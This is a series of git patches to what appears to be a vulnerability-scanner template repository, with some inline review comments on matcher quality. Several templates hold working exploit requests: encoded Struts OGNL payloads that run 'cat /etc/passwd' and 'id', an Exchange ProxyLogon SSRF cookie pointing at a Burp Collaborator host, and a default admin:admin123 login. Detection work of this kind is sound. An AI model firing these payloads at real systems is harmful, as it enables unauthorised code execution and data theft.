"{{BaseURL}}/link.action?a=%24%7b%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%5b%22%61%6c%6c%6f%77%53%74%61%74%69%63%4d%65%74%68%6f%64%41%63%63%65%73%73%22%5d%3d%74%72%75%65%2c%23%61%3d%40%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%40%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%27%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%27%29%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%2c%23%62%3d%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%49%6e%70%75%74%53%74%72%65%61%6d%52%65%61%64%65%72%28%23%61%29%2c%23%63%3d%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%42%75%66%66%65%72%65%64%52%65%61%64%65%72%28%23%62%29%2c%23%64%3d%6e%65%77%20%63%68%61%72%5b%35%30%30%30%30%5d%2c%23%63%2e%72%65%61%64%28%23%64%29%2c%23%6f%75%74%3d%40%6f%72%67%2e%61%70%61%63%68%65%2e%73%74%72%75%74%73%32%2e%53%65%72%76%6c%65%74%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%40%67%65%74%52%65%73%70%6f%6e%73%65%28%29%2e%67%65%74%57%72%69%74%65%72%28%29%2c%23%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%27%64%62%61%70%70%3d%27%2b%6e%65%77%20%6a%61%76%61%2e%6c%61%6e%67%2e%53%74%72%69%6e%67%28%23%64%29%29%2c%23%6f%75%74%2e%63%6c%6f%73%65%28%29%7d" - headers: - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: id,en-US;q=0.7,en;q=0.3 - - matchers-condition: and - matchers: - - type: word - words: - - "Content-Type: text/html;charset=UTF-8" - part: header - - - type: regex - regex: - - "root:[x*]:0:0" - condition: and - - - type: status - status: - - 200 
diff --git a/cves/2013/CVE-2013-2134.yaml b/cves/2013/CVE-2013-2134.yaml deleted file mode 100644 index ad8111c610..0000000000 --- a/cves/2013/CVE-2013-2134.yaml +++ /dev/null 
@@ -1,32 +0,0 @@ -id: CVE-2013-2134 - -info: - name: Apache Struts2 S2-015 RCE - author: pikpikcu - severity: critical - reference: https://blog.csdn.net/weixin_43416469/article/details/113852197?utm_medium=distribute.pc_relevant.none-task-blog-OPENSEARCH-11.control&dist_request_id=979f56d5-0937-4e8d-8e1e-79f3a5d24e14&depth_1-utm_source=distribute.pc_relevant.none-task-blog-OPENSEARCH-11.control - tags: cve,cve2013,apache,rce,struts - -requests: - - method: GET - path: - - "{{BaseURL}}/param.action?message=%25%7b%23%61%3d%28%6e%65%77%20%6a%61%76%61%2e%6c%61%6e%67%2e%50%72%6f%63%65%73%73%42%75%69%6c%64%65%72%28%6e%65%77%20%6a%61%76%61%2e%6c%61%6e%67%2e%53%74%72%69%6e%67%5b%5d%7b%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%7d%29%29%2e%72%65%64%69%72%65%63%74%45%72%72%6f%72%53%74%72%65%61%6d%28%74%72%75%65%29%2e%73%74%61%72%74%28%29%2c%23%62%3d%23%61%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%2c%23%63%3d%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%49%6e%70%75%74%53%74%72%65%61%6d%52%65%61%64%65%72%28%23%62%29%2c%23%64%3d%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%42%75%66%66%65%72%65%64%52%65%61%64%65%72%28%23%63%29%2c%23%65%3d%6e%65%77%20%63%68%61%72%5b%35%30%30%30%30%5d%2c%23%64%2e%72%65%61%64%28%23%65%29%2c%23%66%3d%23%63%6f%6e%74%65%78%74%2e%67%65%74%28%22%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%64%69%73%70%61%74%63%68%65%72%2e%48%74%74%70%53%65%72%76%6c%65%74%52%65%73%70%6f%6e%73%65%22%29%2c%23%66%2e%67%65%74%57%72%69%74%65%72%28%29%2e%70%72%69%6e%74%6c%6e%28%6e%65%77%20%6a%61%76%61%2e%6c%61%6e%67%2e%53%74%72%69%6e%67%28%23%65%29%29%2c%23%66%2e%67%65%74%57%72%69%74%65%72%28%29%2e%66%6c%75%73%68%28%29%2c%23%66%2e%67%65%74%57%72%69%74%65%72%28%29%2e%63%6c%6f%73%65%28%29%7d" - headers: - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: id,en-US;q=0.7,en;q=0.3 - - matchers-condition: and - matchers: - - type: word - words: - - "Content-Type: text/html" - part: header - - - type: regex - regex: 
- - "root:[x*]:0:0" - condition: and - - - type: status - status: - - 200 diff --git a/cves/2013/CVE-2013-2135.yaml b/cves/2013/CVE-2013-2135.yaml deleted file mode 100644 index 49b8b8479d..0000000000 --- a/cves/2013/CVE-2013-2135.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: CVE-2013-2135 - -info: - name: Apache Struts2 S2-015 RCE - author: pikpikcu - severity: critical - reference: https://nvd.nist.gov/vuln/detail/CVE-2013-2135 - tags: cve,cve2013,apache,rce,struts - -requests: - - method: GET - path: - - "{{BaseURL}}/param.action${%23context['xwork.MethodAccessor.denyMethodExecution']=false,%23f=%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),%23f.setAccessible(true),%23f.set(%23_memberAccess,true),@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())}.action" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)" - condition: and - - - type: status - status: - - 404 diff --git a/cves/2017/CVE-2017-12611.yaml b/cves/2017/CVE-2017-12611.yaml index 2519feaf3f..a64eea1c2c 100644 --- a/cves/2017/CVE-2017-12611.yaml +++ b/cves/2017/CVE-2017-12611.yaml @@ -18,8 +18,7 @@ requests: - type: regex regex: - "root:[x*]:0:0" - condition: and - + - type: status status: - 200 diff --git a/cves/2018/CVE-2018-11776.yaml b/cves/2018/CVE-2018-11776.yaml index 522ae3000b..4565a6163c 100644 --- a/cves/2018/CVE-2018-11776.yaml +++ b/cves/2018/CVE-2018-11776.yaml @@ -18,8 +18,7 @@ requests: - type: regex regex: - "root:[x*]:0:0" - condition: and - + - type: status status: - 200 From 6c84f959f94d1fb759410252b7c837e3f624c669 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 6 Mar 2021 02:14:21 +0530 Subject: [PATCH 265/370] fixed trailing spaces --- cves/2017/CVE-2017-12611.yaml | 2 +- cves/2018/CVE-2018-11776.yaml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) 
diff --git a/cves/2017/CVE-2017-12611.yaml b/cves/2017/CVE-2017-12611.yaml index a64eea1c2c..08f492bb34 100644 --- a/cves/2017/CVE-2017-12611.yaml +++ b/cves/2017/CVE-2017-12611.yaml @@ -18,7 +18,7 @@ requests: - type: regex regex: - "root:[x*]:0:0" - + - type: status status: - 200 diff --git a/cves/2018/CVE-2018-11776.yaml b/cves/2018/CVE-2018-11776.yaml index 4565a6163c..220780dedd 100644 --- a/cves/2018/CVE-2018-11776.yaml +++ b/cves/2018/CVE-2018-11776.yaml @@ -18,7 +18,7 @@ requests: - type: regex regex: - "root:[x*]:0:0" - + - type: status status: - 200 From 8826f380d6480cbbb868312ea082a085f785f59a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 5 Mar 2021 20:46:48 +0000 Subject: [PATCH 266/370] Auto Update README [Fri Mar 5 20:46:48 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 27033a9b37..81af360a9a 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 220 | vulnerabilities | 105 | exposed-panels | 100 | +| cves | 227 | vulnerabilities | 105 | exposed-panels | 100 | | exposures | 60 | technologies | 50 | misconfiguration | 50 | | workflows | 23 | miscellaneous | 16 | default-logins | 17 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**69 directories, 676 files**. +**71 directories, 683 files**. From 5555d64db3ec55072c49a4359dc8547285d1ddfe Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Sat, 6 Mar 2021 02:04:44 +0000 Subject: [PATCH 267/370] Update CVE-2019-0221.yaml --- cves/2019/CVE-2019-0221.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
diff --git a/cves/2019/CVE-2019-0221.yaml b/cves/2019/CVE-2019-0221.yaml index a14d2acc9a..ea7e1f4d23 100644 --- a/cves/2019/CVE-2019-0221.yaml +++ b/cves/2019/CVE-2019-0221.yaml @@ -10,7 +10,7 @@ info: 7.0.0 to 7.0.93 echoes user provided data without escaping and is, therefore, vulnerable to XSS. SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website. - tags: cve, cve2019,apache,xss + tags: cve,cve2019,apache,xss requests: - method: GET From 7851d3125307ed4fb85082e239e91139f3a167f5 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Sat, 6 Mar 2021 02:36:53 +0000 Subject: [PATCH 268/370] Create nexus-default-password.yaml --- .../nexus/nexus-default-password.yaml | 25 +++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 default-logins/nexus/nexus-default-password.yaml diff --git a/default-logins/nexus/nexus-default-password.yaml b/default-logins/nexus/nexus-default-password.yaml new file mode 100644 index 0000000000..e4b30a3931 --- /dev/null +++ b/default-logins/nexus/nexus-default-password.yaml @@ -0,0 +1,25 @@ +id: nexus-default-password + +info: + name: Nexus Default Password + author: pdteam + severity: low + tags: nexus,dlogin + +requests: + - method: GET + path: + - "{{BaseURL}}/service/local/authentication/login" + headers: + Content-Type: application/json + Authorization: "Basic YWRtaW46YWRtaW4xMjM=" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "loggedIn" + condition: and From 46b484f9ad019a9275516328b53e5521e95ca0f7 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sat, 6 Mar 2021 11:28:28 +0530 Subject: [PATCH 269/370] Update CVE-2019-0221.yaml --- cves/2019/CVE-2019-0221.yaml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) 
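Review bot: The word matcher on `loggedIn` in the nexus-default-password hunk checks only for the field name, not its value, so if the authentication endpoint also returns a `loggedIn` key for anonymous or rejected sessions (e.g. `"loggedIn":false`) every reachable Nexus would be reported as accepting `admin:admin123`. Match the success value instead, e.g. `- '"loggedIn":true'` with `part: body`, and verify what the endpoint returns without credentials before relying on it; `condition: and` on a single-entry list has no effect. The `Content-Type: application/json` header on a body-less GET is meaningless and can be dropped.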
diff --git a/cves/2019/CVE-2019-0221.yaml b/cves/2019/CVE-2019-0221.yaml index ea7e1f4d23..90b1081257 100644 --- a/cves/2019/CVE-2019-0221.yaml +++ b/cves/2019/CVE-2019-0221.yaml @@ -23,7 +23,11 @@ requests: - type: word words: - "" - condition: and + + - type: word + words: + - "text/html" + part: header - type: status status: From a52d6fd7e57a3308bec402f0143a56c818536269 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 6 Mar 2021 05:59:16 +0000 Subject: [PATCH 270/370] Auto Update README [Sat Mar 6 05:59:16 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 81af360a9a..2165399464 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 227 | vulnerabilities | 105 | exposed-panels | 100 | +| cves | 228 | vulnerabilities | 105 | exposed-panels | 100 | | exposures | 60 | technologies | 50 | misconfiguration | 50 | | workflows | 23 | miscellaneous | 16 | default-logins | 17 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**71 directories, 683 files**. +**71 directories, 684 files**. From cde0571f4b768539207d822d9717ad6145ef1ee2 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sat, 6 Mar 2021 11:56:16 +0530 Subject: [PATCH 271/370] misc updates --- cves/2016/CVE-2016-3081.yaml | 2 +- cves/2017/CVE-2017-5638.yaml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2016/CVE-2016-3081.yaml b/cves/2016/CVE-2016-3081.yaml index f0478d8b38..1e15993eb2 100644 --- a/cves/2016/CVE-2016-3081.yaml +++ b/cves/2016/CVE-2016-3081.yaml 
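Review bot: The `text/html` header matcher added in this hunk does not narrow detection — nearly every HTTP response, including generic 200 landing pages, carries that content type, so the template still reports any host that returns 200 for `/printenv.shtml`. To confirm that the SSI `printenv` directive actually ran, match what the echo produces rather than the content type: the payload reflected unencoded in `part: body` with a negative matcher on `&lt;script&gt;`, and, if verified on a vulnerable Tomcat, a variable name printenv emits such as `QUERY_STRING`. The enclosing `matchers` list starts outside this hunk.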
@@ -1,7 +1,7 @@ id: CVE-2016-3081 info: - name: S2-032 Struts RCE + name: Apache S2-032 Struts RCE author: dhiyaneshDK severity: high reference: https://cwiki.apache.org/confluence/display/WW/S2-032 diff --git a/cves/2017/CVE-2017-5638.yaml b/cves/2017/CVE-2017-5638.yaml index 6696adbe72..11d7004986 100644 --- a/cves/2017/CVE-2017-5638.yaml +++ b/cves/2017/CVE-2017-5638.yaml @@ -1,7 +1,7 @@ id: CVE-2017-5638 info: author: Random Robbie - name: Struts2 RCE + name: Apache Struts2 RCE severity: critical description: Struts is vulnerable to remote command injection attacks through incorrectly parsing an attacker’s invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server. tags: cve,cve2017,struts,rce,apache From 55e4c5d32ed5a298405409f35272247b1e0626b8 Mon Sep 17 00:00:00 2001 From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com> Date: Sat, 6 Mar 2021 12:30:59 +0530 Subject: [PATCH 272/370] Create CVE-2021-26855.yaml --- cves/2021/CVE-2021-26855.yaml | 36 +++++++++++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 cves/2021/CVE-2021-26855.yaml diff --git a/cves/2021/CVE-2021-26855.yaml b/cves/2021/CVE-2021-26855.yaml new file mode 100644 index 0000000000..0b1f46750a --- /dev/null +++ b/cves/2021/CVE-2021-26855.yaml 
@@ -0,0 +1,36 @@ +id: CVE-2021-26855 + +info: + name: Exchange Server SSRF Vulnerability + author: madrobot + severity: critical + reference: https://proxylogon.com/#timeline + description: | + Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078. + tags: cve,cve2021,ssrf,rce,exchange + +requests: + - raw: + - | + GET /owa/auth/x.js HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 + Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;pro + Accept-Language: en + Connection: close + + + # Detection script + # https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse + # https://www.shodan.io/search?query=vuln%3ACVE-2021-26855 + + matchers-condition: and + matchers: + - type: status + status: + - 500 + - type: word + words: + - "NegotiateSecurityContext" + part: body + condtion: and From d12120355c0aa12d2b98796ca7922f71f231435b Mon Sep 17 00:00:00 2001 From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com> Date: Sat, 6 Mar 2021 12:37:41 +0530 Subject: [PATCH 273/370] Update CVE-2021-26855.yaml --- cves/2021/CVE-2021-26855.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-26855.yaml b/cves/2021/CVE-2021-26855.yaml index 0b1f46750a..8deb576ec9 100644 --- a/cves/2021/CVE-2021-26855.yaml +++ b/cves/2021/CVE-2021-26855.yaml 
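Review bot: `condtion: and` on the last matcher is misspelled, so the key is silently ignored or rejected by a strict loader; it should read `condition: and`, though on a single-entry `words` list it has no effect and can simply be dropped. The three `# Detection script` lines sit inside the `- |` raw request, after the blank line that ends the headers; if they are indented at the block scalar's content level they are not YAML comments but part of the literal string and are sent to the target as a request body — indentation is not recoverable from this listing, so check the file. Move those URLs into `info` (under `reference`) or above `requests:`.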
@@ -15,7 +15,7 @@ requests: GET /owa/auth/x.js HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 - Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;pro + Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3; Accept-Language: en Connection: close From 9ac013952d985e336bd1900f70695fb89eb206c7 Mon Sep 17 00:00:00 2001 From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com> Date: Sat, 6 Mar 2021 12:46:45 +0530 Subject: [PATCH 274/370] Update CVE-2021-26855.yaml --- cves/2021/CVE-2021-26855.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/cves/2021/CVE-2021-26855.yaml b/cves/2021/CVE-2021-26855.yaml index 8deb576ec9..4f67df6255 100644 --- a/cves/2021/CVE-2021-26855.yaml +++ b/cves/2021/CVE-2021-26855.yaml @@ -15,7 +15,7 @@ requests: GET /owa/auth/x.js HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 - Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3; + Cookie: X-AnonResource=true; X-AnonResource-Backend=vih3tn1ubo2welhfoqwaenoin9tzho.burpcollaborator.net/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3; Accept-Language: en Connection: close @@ -28,9 +28,9 @@ requests: matchers: - type: status status: - - 500 + - 200 - type: word words: - - "NegotiateSecurityContext" + - "vih3tn1ubo2welhfoqwaenoin9tzho" part: body condtion: and From 61327f4d96a6f8db3d25f9c08eb3b2812483fa6d Mon Sep 17 00:00:00 2001 From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com> Date: Sat, 6 Mar 2021 13:02:30 +0530 Subject: [PATCH 275/370] Update CVE-2021-26855.yaml --- cves/2021/CVE-2021-26855.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) 
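Review bot: After this hunk detection depends on the Exchange server reaching `vih3tn1ubo2welhfoqwaenoin9tzho.burpcollaborator.net` on the public internet and echoing that subdomain back, so a vulnerable server with filtered egress is reported clean, the session-bound Collaborator ID goes stale as soon as that Burp session ends, and every scan discloses the target to a third-party host. The variant this replaces — `X-AnonResource-Backend=localhost/...` with `status: 500` and the `NegotiateSecurityContext` body string, which as far as I can tell is also what the Microsoft NSE referenced in the comments checks — needed no external service. If the local-backend response proves unreliable, a scanner-controlled and rotatable callback host is preferable to a hard-coded one; the `condtion:` typo in the last matcher also carries over unchanged.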
diff --git a/cves/2021/CVE-2021-26855.yaml b/cves/2021/CVE-2021-26855.yaml index 4f67df6255..afe13d3e0b 100644 --- a/cves/2021/CVE-2021-26855.yaml +++ b/cves/2021/CVE-2021-26855.yaml @@ -15,7 +15,7 @@ requests: GET /owa/auth/x.js HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 - Cookie: X-AnonResource=true; X-AnonResource-Backend=vih3tn1ubo2welhfoqwaenoin9tzho.burpcollaborator.net/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3; + Cookie: X-AnonResource=true; X-AnonResource-Backend=burpcollaborator.net/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3; Accept-Language: en Connection: close @@ -31,6 +31,6 @@ requests: - 200 - type: word words: - - "vih3tn1ubo2welhfoqwaenoin9tzho" + - "Burp Collaborator Server" part: body condtion: and From c6deb0c2fc1a0a201add1947db6737c7ab0afc45 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sat, 6 Mar 2021 13:04:26 +0530 Subject: [PATCH 276/370] misc changes --- cves/2021/CVE-2021-26855.yaml | 11 ++++------- 1 file changed, 4 insertions(+), 7 deletions(-) diff --git a/cves/2021/CVE-2021-26855.yaml b/cves/2021/CVE-2021-26855.yaml index afe13d3e0b..86eefd4bd7 100644 --- a/cves/2021/CVE-2021-26855.yaml +++ b/cves/2021/CVE-2021-26855.yaml @@ -5,10 +5,13 @@ info: author: madrobot severity: critical reference: https://proxylogon.com/#timeline + nse: https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse + dork: https://www.shodan.io/search?query=vuln%3ACVE-2021-26855 description: | Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078. tags: cve,cve2021,ssrf,rce,exchange + requests: - raw: - | 
@@ -19,11 +22,6 @@ requests: Accept-Language: en Connection: close - - # Detection script - # https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse - # https://www.shodan.io/search?query=vuln%3ACVE-2021-26855 - matchers-condition: and matchers: - type: status @@ -32,5 +30,4 @@ requests: - type: word words: - "Burp Collaborator Server" - part: body - condtion: and + part: body \ No newline at end of file From 4622871ad975db29cbc072e05321f6f60940a882 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 6 Mar 2021 07:35:56 +0000 Subject: [PATCH 277/370] Auto Update README [Sat Mar 6 07:35:56 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 2165399464..4d2fbb620f 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 228 | vulnerabilities | 105 | exposed-panels | 100 | +| cves | 229 | vulnerabilities | 105 | exposed-panels | 100 | | exposures | 60 | technologies | 50 | misconfiguration | 50 | | workflows | 23 | miscellaneous | 16 | default-logins | 17 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**71 directories, 684 files**. +**71 directories, 685 files**. From 3e22272fbc49f83e86f3bb0f0e40faf7be680b4c Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sat, 6 Mar 2021 16:05:21 +0530 Subject: [PATCH 278/370] Adding version print thanks to @@meme-lord --- exposures/configs/phpinfo.yaml | 15 ++++++++++++++- 1 file changed, 14 insertions(+), 1 deletion(-) 
diff --git a/exposures/configs/phpinfo.yaml b/exposures/configs/phpinfo.yaml index e49e256cce..ecc7dabbdc 100644 --- a/exposures/configs/phpinfo.yaml +++ b/exposures/configs/phpinfo.yaml @@ -2,7 +2,7 @@ id: phpinfo-files info: name: phpinfo Disclosure - author: pd-team & daffainfo + author: pd-team & daffainfo & meme-lord severity: low requests: @@ -25,9 +25,22 @@ requests: - "{{BaseURL}}/infos.php" - "{{BaseURL}}/linusadmin-phpinfo.php" - "{{BaseURL}}/php-info.php" + + matchers-condition: and matchers: - type: word words: - "PHP Extension" - "PHP Version" condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - '>PHP Version <\/td>([0-9.]+)' \ No newline at end of file From 855da4abcdef1cb3245cd3785c3b194ca31c6bd0 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sat, 6 Mar 2021 16:25:24 +0530 Subject: [PATCH 279/370] Additional references --- cves/2020/CVE-2020-12116.yaml | 4 +--- cves/2021/CVE-2021-26855.yaml | 9 +++++---- 2 files changed, 6 insertions(+), 7 deletions(-) diff --git a/cves/2020/CVE-2020-12116.yaml b/cves/2020/CVE-2020-12116.yaml index 80f6378499..c002797d46 100644 --- a/cves/2020/CVE-2020-12116.yaml +++ b/cves/2020/CVE-2020-12116.yaml @@ -6,9 +6,7 @@ info: severity: high description: Zoho ManageEngine OpManager Stable build before 124196 and Released build before 125125 allows an unauthenticated attacker to read arbitrary files on the server by sending a crafted request. tags: cve,cve2020,zoho,traversal - - # References: - # - https://github.com/BeetleChunks/CVE-2020-12116 + reference: https://github.com/BeetleChunks/CVE-2020-12116 requests: - raw: diff --git a/cves/2021/CVE-2021-26855.yaml b/cves/2021/CVE-2021-26855.yaml index 86eefd4bd7..f07e465fe3 100644 --- a/cves/2021/CVE-2021-26855.yaml +++ b/cves/2021/CVE-2021-26855.yaml 
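Review bot: The new extractor regex `'>PHP Version <\/td>([0-9.]+)'` requires digits immediately after `</td>`, but in the phpinfo markup I am familiar with the version row is `<td class="e">PHP Version </td><td class="v">7.4.3 </td>` and the heading is `<h1 class="p">PHP Version 7.4.3</h1>`, so on either the group would never capture and the extractor silently yields nothing. Worth verifying against a live phpinfo page; a form that covers both layouts is `- 'PHP Version\s*(?:<\/td><td class="v">)?([0-9]+\.[0-9.]+)'`. The `path` and `matchers` lists this hunk touches start outside the hunk.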
@@ -4,13 +4,14 @@ info: name: Exchange Server SSRF Vulnerability author: madrobot severity: critical - reference: https://proxylogon.com/#timeline - nse: https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse - dork: https://www.shodan.io/search?query=vuln%3ACVE-2021-26855 description: | Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078. tags: cve,cve2021,ssrf,rce,exchange - + reference: | + - https://proxylogon.com/#timeline + - https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse + - https://www.shodan.io/search?query=vuln%3ACVE-2021-26855 + - https://gist.github.com/testanull/324546bffab2fe4916d0f9d1f03ffa09 requests: - raw: From 53f92f32dcc7b6dd3a6ada0e34437fba3d59c27a Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Sat, 6 Mar 2021 21:06:03 +0700 Subject: [PATCH 280/370] Create CVE-2015-2080.yaml --- cves/2015/CVE-2015-2080.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 cves/2015/CVE-2015-2080.yaml diff --git a/cves/2015/CVE-2015-2080.yaml b/cves/2015/CVE-2015-2080.yaml new file mode 100644 index 0000000000..4e23cc8275 --- /dev/null +++ b/cves/2015/CVE-2015-2080.yaml 
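Review bot: `reference: |` makes the value a single multi-line string whose lines begin with a literal `- `, not a YAML sequence, so anything that reads `reference` as a URL receives text like `- https://proxylogon.com/#timeline\n- https://...` rather than addresses it can link or validate. If the nuclei `info` schema at this version accepts lists, drop the `|` and write a block sequence (`reference:` followed by the `- https://...` lines); if it only accepts a string, keep one primary URL there and fold the rest into `description`. Relocating the non-standard `nse`/`dork` keys out of `info` is otherwise the right move.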
@@ -0,0 +1,26 @@
+id: CVE-2015-2080
+
+info:
+  name: Eclipse Jetty Remote Leakage
+  author: pikpikcu
+  severity: medium
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2015-2080
+  description: |
+    The exception handling code in Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header, aka JetLeak
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/"
+    headers:
+      Referer: "\x00"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 400
+      - type: word
+        words:
+          - "Illegal character 0x0 in state"
+        part: header
From e6e4c27e0fc13ec0c3c0d56e20dbc9e4029371ec Mon Sep 17 00:00:00 2001
From: partyh4rd <31990479+P4rtyH4RD@users.noreply.github.com>
Date: Sat, 6 Mar 2021 17:49:32 +0300
Subject: [PATCH 281/370] Update microsoft-echange-server-detect.yaml

---
 technologies/microsoft-echange-server-detect.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/technologies/microsoft-echange-server-detect.yaml b/technologies/microsoft-echange-server-detect.yaml
index d06d3b6aa9..b89745b772 100644
--- a/technologies/microsoft-echange-server-detect.yaml
+++ b/technologies/microsoft-echange-server-detect.yaml
@@ -1,4 +1,4 @@
-id: microsoft-echange-server-detect
+id: microsoft-exchange-server-detect
 
 info:
   name: Microsoft Exchange Server Detect
From 0d1d8bd832b8fbb55745d38b43b0a2405263bc91 Mon Sep 17 00:00:00 2001
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com>
Date: Sun, 7 Mar 2021 07:51:23 +0000
Subject: [PATCH 282/370] Update exposed-hg.yaml

---
